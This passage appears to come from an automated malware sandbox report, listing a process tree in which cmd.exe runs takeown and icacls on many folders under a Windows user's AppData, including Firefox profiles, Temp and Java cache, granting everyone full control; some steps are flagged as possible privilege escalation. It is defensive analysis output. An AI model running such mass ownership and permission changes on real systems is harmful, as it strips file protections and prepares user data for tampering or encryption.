C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Media /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.03⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft Help && icacls C:\Users\Admin\AppData\Local\Microsoft Help /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft Help3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla && icacls C:\Users\Admin\AppData\Local\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.Admin && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2 && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache23⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\doomed && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\doomed /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\doomed3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\doomed /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\entries && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\entries /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\entries3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\entries /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\safebrowsing && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\safebrowsing /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\safebrowsing3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\safebrowsing /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\startupCache && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\startupCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\startupCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\startupCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\thumbnails && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\thumbnails /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\thumbnails3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\thumbnails /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp && icacls C:\Users\Admin\AppData\Local\Temp /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\2765442843 && icacls C:\Users\Admin\AppData\Local\Temp\2765442843 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\27654428433⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\2765442843 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin && icacls C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Low && icacls C:\Users\Admin\AppData\Local\Temp\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219 && icacls C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.402193⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219 && icacls C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.402193⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files && icacls C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044 && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_13249900443⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044\CRX_INSTALL && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044\CRX_INSTALL /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044\CRX_INSTALL3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1324990044\CRX_INSTALL /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196 && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_16290961963⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196 /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196\CRX_INSTALL && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196\CRX_INSTALL /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196\CRX_INSTALL3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1856_1629096196\CRX_INSTALL /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\VBE && icacls C:\Users\Admin\AppData\Local\Temp\VBE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\VBE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\VBE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\WPDNSE && icacls C:\Users\Admin\AppData\Local\Temp\WPDNSE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\WPDNSE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\WPDNSE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temporary Internet Files && icacls C:\Users\Admin\AppData\Local\Temporary Internet Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temporary Internet Files3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow && icacls C:\Users\Admin\AppData\LocalLow /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft && icacls C:\Users\Admin\AppData\LocalLow\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Mozilla && icacls C:\Users\Admin\AppData\LocalLow\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Mozilla3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Mozilla /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun && icacls C:\Users\Admin\AppData\LocalLow\Sun /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\103⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\113⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\123⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\133⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 /grant everyone:(f)3⤵
-
-
-
